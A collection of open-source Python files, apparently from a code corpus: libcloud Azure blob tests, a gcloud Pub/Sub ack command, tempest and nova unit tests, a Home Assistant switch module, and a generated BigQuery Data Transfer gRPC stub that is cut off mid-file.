extra = {'meta_data': {'some-value': 'foobar'}}
obj = self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=False,
ex_blob_type='BlockBlob')
self.assertEqual(obj.name, 'foo_test_upload')
self.assertEqual(obj.size, file_size)
self.assertTrue('some-value' in obj.meta_data)
def test_upload_big_block_object_success(self):
file_path = tempfile.mktemp(suffix='.jpg')
file_size = AZURE_BLOCK_MAX_SIZE + 1
with open(file_path, 'w') as file_hdl:
file_hdl.write('0' * file_size)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'meta_data': {'some-value': 'foobar'}}
obj = self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=False,
ex_blob_type='BlockBlob')
self.assertEqual(obj.name, 'foo_test_upload')
self.assertEqual(obj.size, file_size)
self.assertTrue('some-value' in obj.meta_data)
os.remove(file_path)
def test_upload_page_object_success(self):
self.mock_response_klass.use_param = None
file_path = tempfile.mktemp(suffix='.jpg')
file_size = AZURE_PAGE_CHUNK_SIZE * 4
with open(file_path, 'w') as file_hdl:
file_hdl.write('0' * file_size)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'meta_data': {'some-value': 'foobar'}}
obj = self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=False,
ex_blob_type='PageBlob')
self.assertEqual(obj.name, 'foo_test_upload')
self.assertEqual(obj.size, file_size)
self.assertTrue('some-value' in obj.meta_data)
os.remove(file_path)
def test_upload_page_object_failure(self):
file_path = tempfile.mktemp(suffix='.jpg')
file_size = AZURE_PAGE_CHUNK_SIZE * 2 + 1
with open(file_path, 'w') as file_hdl:
file_hdl.write('0' * file_size)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'meta_data': {'some-value': 'foobar'}}
try:
self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=False,
ex_blob_type='PageBlob')
except LibcloudError:
e = sys.exc_info()[1]
self.assertTrue(str(e).lower().find('not aligned') != -1)
os.remove(file_path)
def test_upload_small_block_object_success_with_lease(self):
self.mock_response_klass.use_param = 'comp'
file_path = os.path.abspath(__file__)
file_size = os.stat(file_path).st_size
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'meta_data': {'some-value': 'foobar'}}
obj = self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=False,
ex_blob_type='BlockBlob',
ex_use_lease=True)
self.assertEqual(obj.name, 'foo_test_upload')
self.assertEqual(obj.size, file_size)
self.assertTrue('some-value' in obj.meta_data)
self.mock_response_klass.use_param = None
def test_upload_big_block_object_success_with_lease(self):
self.mock_response_klass.use_param = 'comp'
file_path = tempfile.mktemp(suffix='.jpg')
file_size = AZURE_BLOCK_MAX_SIZE * 2
with open(file_path, 'w') as file_hdl:
file_hdl.write('0' * file_size)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'meta_data': {'some-value': 'foobar'}}
obj = self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=False,
ex_blob_type='BlockBlob',
ex_use_lease=False)
self.assertEqual(obj.name, 'foo_test_upload')
self.assertEqual(obj.size, file_size)
self.assertTrue('some-value' in obj.meta_data)
os.remove(file_path)
self.mock_response_klass.use_param = None
def test_upload_page_object_success_with_lease(self):
self.mock_response_klass.use_param = 'comp'
file_path = tempfile.mktemp(suffix='.jpg')
file_size = AZURE_PAGE_CHUNK_SIZE * 4
with open(file_path, 'w') as file_hdl:
file_hdl.write('0' * file_size)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'meta_data': {'some-value': 'foobar'}}
obj = self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=False,
ex_blob_type='PageBlob',
ex_use_lease=True)
self.assertEqual(obj.name, 'foo_test_upload')
self.assertEqual(obj.size, file_size)
self.assertTrue('some-value' in obj.meta_data)
os.remove(file_path)
self.mock_response_klass.use_param = None
def test_upload_blob_object_via_stream(self):
self.mock_response_klass.use_param = 'comp'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
iterator = BytesIO(b('345'))
extra = {'content_type': 'text/plain'}
obj = self.driver.upload_object_via_stream(container=container,
object_name=object_name,
iterator=iterator,
extra=extra,
ex_blob_type='BlockBlob')
self.assertEqual(obj.name, object_name)
self.assertEqual(obj.size, 3)
self.mock_response_klass.use_param = None
def test_upload_blob_object_via_stream_with_lease(self):
self.mock_response_klass.use_param = 'comp'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
iterator = BytesIO(b('345'))
extra = {'content_type': 'text/plain'}
obj = self.driver.upload_object_via_stream(container=container,
object_name=object_name,
iterator=iterator,
extra=extra,
ex_blob_type='BlockBlob',
ex_use_lease=True)
self.assertEqual(obj.name, object_name)
self.assertEqual(obj.size, 3)
self.mock_response_klass.use_param = None
def test_upload_page_object_via_stream(self):
self.mock_response_klass.use_param = 'comp'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
blob_size = AZURE_PAGE_CHUNK_SIZE
iterator = BytesIO(b('1' * blob_size))
extra = {'content_type': 'text/plain'}
obj = self.driver.upload_object_via_stream(container=container,
object_name=object_name,
iterator=iterator,
extra=extra,
ex_blob_type='PageBlob',
ex_page_blob_size=blob_size)
self.assertEqual(obj.name, object_name)
self.assertEqual(obj.size, blob_size)
self.mock_response_klass.use_param = None
def test_upload_page_object_via_stream_with_lease(self):
self.mock_response_klass.use_param = 'comp'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
blob_size = AZURE_PAGE_CHUNK_SIZE
iterator = BytesIO(b('1' * blob_size))
extra = {'content_type': 'text/plain'}
obj = self.driver.upload_object_via_stream(container=container,
object_name=object_name,
iterator=iterator,
extra=extra,
ex_blob_type='PageBlob',
ex_page_blob_size=blob_size,
ex_use_lease=True)
self.assertEqual(obj.name, object_name)
self.assertEqual(obj.size, blob_size)
def test_delete_object_not_found(self):
self.mock_response_klass.type = 'NOT_FOUND'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1234, hash=None, extra=None,
meta_data=None, container=container, driver=self.driver)
try:
self.driver.delete_object(obj=obj)
except ObjectDoesNotExistError:
pass
else:
self.fail('Exception was not thrown')
def test_delete_object_success(self):
self.mock_response_klass.type = 'DELETE'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1234, hash=None, extra=None,
meta_data=None, container=container, driver=self.driver)
result = self.driver.delete_object(obj=obj)
self.assertTrue(result)
def test_storage_driver_host(self):
# Non regression tests for issue LIBCLOUD-399 dealing with the bad
# management of the connectionCls.host class attribute
driver1 = self.driver_type('fakeaccount1', 'deadbeafcafebabe==')
driver2 = self.driver_type('fakeaccount2', 'deadbeafcafebabe==')
driver3 = self.driver_type('fakeaccount3', 'deadbeafcafebabe==',
host='test.foo.bar.com')
host1 = driver1.connection.host
host2 = driver2.connection.host
host3 = driver3.connection.host
self.assertEqual(host1, 'fakeaccount1.blob.core.windows.net')
self.assertEqual(host2, 'fakeaccount2.blob.core.windows.net')
self.assertEqual(host3, 'test.foo.bar.com')
if __name__ == '__main__':
sys.exit(unittest.main())
| pquentin/libcloud | libcloud/test/storage/test_azure_blobs.py | Python | apache-2.0 | 38,350 |
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Pub/Sub topics publish command."""
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.pubsub import util
class Ack(base.Command):
"""Acknowledges one or more messages on the specified subscription.
Acknowledges one or more messages as having been successfully received.
If a delivered message is not acknowledged, Cloud Pub/Sub will attempt to
deliver it again.
"""
@staticmethod
def Args(parser):
"""Register flags for this command."""
parser.add_argument('subscription',
help='Subscription name to ACK messages on.')
parser.add_argument('ackid', nargs='+',
help='One or more AckId to acknowledge.')
def Collection(self):
return util.SUBSCRIPTIONS_ACK_COLLECTION
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
Ack display dictionary with information about the acknowledged messages
and related subscription.
"""
msgs = self.context['pubsub_msgs']
pubsub = self.context['pubsub']
ack_req = msgs.PubsubProjectsSubscriptionsAcknowledgeRequest(
acknowledgeRequest=msgs.AcknowledgeRequest(ackIds=args.ackid),
subscription=util.SubscriptionFormat(args.subscription))
pubsub.projects_subscriptions.Acknowledge(ack_req)
# Using this dict, instead of returning the AcknowledgeRequest directly,
# to preserve the naming conventions for subscriptionId.
return {'subscriptionId': ack_req.subscription,
'ackIds': ack_req.acknowledgeRequest.ackIds}
| KaranToor/MA450 | google-cloud-sdk/lib/surface/pubsub/subscriptions/ack.py | Python | apache-2.0 | 2,299 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .client import FeedItemSetLinkServiceClient
__all__ = ("FeedItemSetLinkServiceClient",)
| googleads/google-ads-python | google/ads/googleads/v9/services/services/feed_item_set_link_service/__init__.py | Python | apache-2.0 | 694 |
# Copyright 2016 Hewlett Packard Enterprise Development LP
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from tempest.lib.common import cred_client
from tempest.tests import base
class TestCredClientV2(base.TestCase):
def setUp(self):
super(TestCredClientV2, self).setUp()
self.identity_client = mock.MagicMock()
self.projects_client = mock.MagicMock()
self.users_client = mock.MagicMock()
self.roles_client = mock.MagicMock()
self.creds_client = cred_client.V2CredsClient(self.identity_client,
self.projects_client,
self.users_client,
self.roles_client)
def test_create_project(self):
self.projects_client.create_tenant.return_value = {
'tenant': 'a_tenant'
}
res = self.creds_client.create_project('fake_name', 'desc')
self.assertEqual('a_tenant', res)
self.projects_client.create_tenant.assert_called_once_with(
name='fake_name', description='desc')
def test_delete_project(self):
self.creds_client.delete_project('fake_id')
self.projects_client.delete_tenant.assert_called_once_with(
'fake_id')
class TestCredClientV3(base.TestCase):
def setUp(self):
super(TestCredClientV3, self).setUp()
self.identity_client = mock.MagicMock()
self.projects_client = mock.MagicMock()
self.users_client = mock.MagicMock()
self.roles_client = mock.MagicMock()
self.domains_client = mock.MagicMock()
self.domains_client.list_domains.return_value = {
'domains': [{'id': 'fake_domain_id'}]
}
self.creds_client = cred_client.V3CredsClient(self.identity_client,
self.projects_client,
self.users_client,
self.roles_client,
self.domains_client,
'fake_domain')
def test_create_project(self):
self.projects_client.create_project.return_value = {
'project': 'a_tenant'
}
res = self.creds_client.create_project('fake_name', 'desc')
self.assertEqual('a_tenant', res)
self.projects_client.create_project.assert_called_once_with(
name='fake_name', description='desc', domain_id='fake_domain_id')
def test_delete_project(self):
self.creds_client.delete_project('fake_id')
self.projects_client.delete_project.assert_called_once_with(
'fake_id')
| Juniper/tempest | tempest/tests/lib/common/test_cred_client.py | Python | apache-2.0 | 3,309 |
"""Reproduce an Switch state."""
import asyncio
import logging
from typing import Iterable, Optional
from homeassistant.const import (
ATTR_ENTITY_ID,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import Context, State
from homeassistant.helpers.typing import HomeAssistantType
from . import DOMAIN
_LOGGER = logging.getLogger(__name__)
VALID_STATES = {STATE_ON, STATE_OFF}
async def _async_reproduce_state(
hass: HomeAssistantType, state: State, context: Optional[Context] = None
) -> None:
"""Reproduce a single state."""
cur_state = hass.states.get(state.entity_id)
if cur_state is None:
_LOGGER.warning("Unable to find entity %s", state.entity_id)
return
if state.state not in VALID_STATES:
_LOGGER.warning(
"Invalid state specified for %s: %s", state.entity_id, state.state
)
return
# Return if we are already at the right state.
if cur_state.state == state.state:
return
service_data = {ATTR_ENTITY_ID: state.entity_id}
if state.state == STATE_ON:
service = SERVICE_TURN_ON
elif state.state == STATE_OFF:
service = SERVICE_TURN_OFF
await hass.services.async_call(
DOMAIN, service, service_data, context=context, blocking=True
)
async def async_reproduce_states(
hass: HomeAssistantType, states: Iterable[State], context: Optional[Context] = None
) -> None:
"""Reproduce Switch states."""
await asyncio.gather(
*(_async_reproduce_state(hass, state, context) for state in states)
)
| leppa/home-assistant | homeassistant/components/switch/reproduce_state.py | Python | apache-2.0 | 1,612 |
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
from nova.api.openstack.compute.contrib import users
from nova.auth.manager import User, Project
from nova import test
from nova.tests.api.openstack import fakes
from nova import utils
def fake_init(self):
self.manager = fakes.FakeAuthManager()
class UsersTest(test.TestCase):
def setUp(self):
super(UsersTest, self).setUp()
self.flags(verbose=True)
self.stubs.Set(users.Controller, '__init__',
fake_init)
fakes.FakeAuthManager.clear_fakes()
fakes.FakeAuthManager.projects = dict(testacct=Project('testacct',
'testacct',
'id1',
'test',
[]))
fakes.FakeAuthDatabase.data = {}
fakes.stub_out_networking(self.stubs)
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_auth(self.stubs)
fakemgr = fakes.FakeAuthManager()
fakemgr.add_user(User('id1', 'guy1', 'acc1', 'secret1', False))
fakemgr.add_user(User('id2', 'guy2', 'acc2', 'secret2', True))
self.controller = users.Controller()
def test_get_user_list(self):
req = fakes.HTTPRequest.blank('/v2/fake/users')
res_dict = self.controller.index(req)
self.assertEqual(len(res_dict['users']), 2)
def test_get_user_by_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/users/id2')
res_dict = self.controller.show(req, 'id2')
self.assertEqual(res_dict['user']['id'], 'id2')
self.assertEqual(res_dict['user']['name'], 'guy2')
self.assertEqual(res_dict['user']['secret'], 'secret2')
self.assertEqual(res_dict['user']['admin'], True)
def test_user_delete(self):
req = fakes.HTTPRequest.blank('/v2/fake/users/id1')
self.controller.delete(req, 'id1')
self.assertTrue('id1' not in [u.id for u in
fakes.FakeAuthManager.auth_data])
def test_user_create(self):
secret = utils.generate_password()
body = dict(user=dict(name='test_guy',
access='acc3',
secret=secret,
admin=True))
req = fakes.HTTPRequest.blank('/v2/fake/users')
res_dict = self.controller.create(req, body)
# NOTE(justinsb): This is a questionable assertion in general
# fake sets id=name, but others might not...
self.assertEqual(res_dict['user']['id'], 'test_guy')
self.assertEqual(res_dict['user']['name'], 'test_guy')
self.assertEqual(res_dict['user']['access'], 'acc3')
self.assertEqual(res_dict['user']['secret'], secret)
self.assertEqual(res_dict['user']['admin'], True)
self.assertTrue('test_guy' in [u.id for u in
fakes.FakeAuthManager.auth_data])
self.assertEqual(len(fakes.FakeAuthManager.auth_data), 3)
def test_user_update(self):
new_secret = utils.generate_password()
body = dict(user=dict(name='guy2',
access='acc2',
secret=new_secret))
req = fakes.HTTPRequest.blank('/v2/fake/users/id2')
res_dict = self.controller.update(req, 'id2', body)
self.assertEqual(res_dict['user']['id'], 'id2')
self.assertEqual(res_dict['user']['name'], 'guy2')
self.assertEqual(res_dict['user']['access'], 'acc2')
self.assertEqual(res_dict['user']['secret'], new_secret)
self.assertEqual(res_dict['user']['admin'], True)
class TestUsersXMLSerializer(test.TestCase):
def test_index(self):
serializer = users.UsersTemplate()
fixture = {'users': [{'id': 'id1',
'name': 'guy1',
'secret': 'secret1',
'admin': False},
{'id': 'id2',
'name': 'guy2',
'secret': 'secret2',
'admin': True}]}
output = serializer.serialize(fixture)
res_tree = etree.XML(output)
self.assertEqual(res_tree.tag, 'users')
self.assertEqual(len(res_tree), 2)
self.assertEqual(res_tree[0].tag, 'user')
self.assertEqual(res_tree[0].get('id'), 'id1')
self.assertEqual(res_tree[1].tag, 'user')
self.assertEqual(res_tree[1].get('id'), 'id2')
def test_show(self):
serializer = users.UserTemplate()
fixture = {'user': {'id': 'id2',
'name': 'guy2',
'secret': 'secret2',
'admin': True}}
output = serializer.serialize(fixture)
res_tree = etree.XML(output)
self.assertEqual(res_tree.tag, 'user')
self.assertEqual(res_tree.get('id'), 'id2')
self.assertEqual(res_tree.get('name'), 'guy2')
self.assertEqual(res_tree.get('secret'), 'secret2')
self.assertEqual(res_tree.get('admin'), 'True')
| rcbops/nova-buildpackage | nova/tests/api/openstack/compute/contrib/test_users.py | Python | apache-2.0 | 5,843 |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.bigquery_datatransfer_v1.proto import datatransfer_pb2 as google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2
from google.cloud.bigquery_datatransfer_v1.proto import transfer_pb2 as google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class DataTransferServiceStub(object):
"""The Google BigQuery Data Transfer Service API enables BigQuery users to
configure the transfer of their data from other Google Products into BigQuery.
This service contains methods that are end user exposed. It backs up the
frontend.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetDataSource = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/GetDataSource',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetDataSourceRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DataSource.FromString,
)
self.ListDataSources = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/ListDataSources',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListDataSourcesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListDataSourcesResponse.FromString,
)
self.CreateTransferConfig = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/CreateTransferConfig',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CreateTransferConfigRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.FromString,
)
self.UpdateTransferConfig = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/UpdateTransferConfig',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.UpdateTransferConfigRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.FromString,
)
self.DeleteTransferConfig = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/DeleteTransferConfig',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DeleteTransferConfigRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GetTransferConfig = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/GetTransferConfig',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetTransferConfigRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.FromString,
)
self.ListTransferConfigs = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/ListTransferConfigs',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferConfigsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferConfigsResponse.FromString,
)
self.ScheduleTransferRuns = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/ScheduleTransferRuns',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ScheduleTransferRunsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ScheduleTransferRunsResponse.FromString,
)
self.GetTransferRun = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/GetTransferRun',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetTransferRunRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferRun.FromString,
)
self.DeleteTransferRun = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/DeleteTransferRun',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DeleteTransferRunRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ListTransferRuns = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/ListTransferRuns',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferRunsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferRunsResponse.FromString,
)
self.ListTransferLogs = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/ListTransferLogs',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferLogsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferLogsResponse.FromString,
)
self.CheckValidCreds = channel.unary_unary(
'/google.cloud.bigquery.datatransfer.v1.DataTransferService/CheckValidCreds',
request_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CheckValidCredsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CheckValidCredsResponse.FromString,
)
class DataTransferServiceServicer(object):
"""The Google BigQuery Data Transfer Service API enables BigQuery users to
configure the transfer of their data from other Google Products into BigQuery.
This service contains methods that are end user exposed. It backs up the
frontend.
"""
def GetDataSource(self, request, context):
"""Retrieves a supported data source and returns its settings,
which can be used for UI rendering.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListDataSources(self, request, context):
"""Lists supported data sources and returns their settings,
which can be used for UI rendering.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateTransferConfig(self, request, context):
"""Creates a new data transfer configuration.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateTransferConfig(self, request, context):
"""Updates a data transfer configuration.
All fields must be set, even if they are not updated.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteTransferConfig(self, request, context):
"""Deletes a data transfer configuration,
including any associated transfer runs and logs.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTransferConfig(self, request, context):
"""Returns information about a data transfer config.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListTransferConfigs(self, request, context):
"""Returns information about all data transfers in the project.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ScheduleTransferRuns(self, request, context):
"""Creates transfer runs for a time range [start_time, end_time].
For each date - or whatever granularity the data source supports - in the
range, one transfer run is created.
Note that runs are created per UTC time in the time range.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTransferRun(self, request, context):
"""Returns information about the particular transfer run.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteTransferRun(self, request, context):
"""Deletes the specified transfer run.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListTransferRuns(self, request, context):
"""Returns information about running and completed jobs.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListTransferLogs(self, request, context):
"""Returns user facing log messages for the data transfer run.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CheckValidCreds(self, request, context):
"""Returns true if valid credentials exist for the given data source and
requesting user.
Some data sources doesn't support service account, so we need to talk to
them on behalf of the end user. This API just checks whether we have OAuth
token for the particular user, which is a pre-requisite before user can
create a transfer config.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DataTransferServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetDataSource': grpc.unary_unary_rpc_method_handler(
servicer.GetDataSource,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetDataSourceRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DataSource.SerializeToString,
),
'ListDataSources': grpc.unary_unary_rpc_method_handler(
servicer.ListDataSources,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListDataSourcesRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListDataSourcesResponse.SerializeToString,
),
'CreateTransferConfig': grpc.unary_unary_rpc_method_handler(
servicer.CreateTransferConfig,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CreateTransferConfigRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.SerializeToString,
),
'UpdateTransferConfig': grpc.unary_unary_rpc_method_handler(
servicer.UpdateTransferConfig,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.UpdateTransferConfigRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.SerializeToString,
),
'DeleteTransferConfig': grpc.unary_unary_rpc_method_handler(
servicer.DeleteTransferConfig,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DeleteTransferConfigRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GetTransferConfig': grpc.unary_unary_rpc_method_handler(
servicer.GetTransferConfig,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetTransferConfigRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferConfig.SerializeToString,
),
'ListTransferConfigs': grpc.unary_unary_rpc_method_handler(
servicer.ListTransferConfigs,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferConfigsRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferConfigsResponse.SerializeToString,
),
'ScheduleTransferRuns': grpc.unary_unary_rpc_method_handler(
servicer.ScheduleTransferRuns,
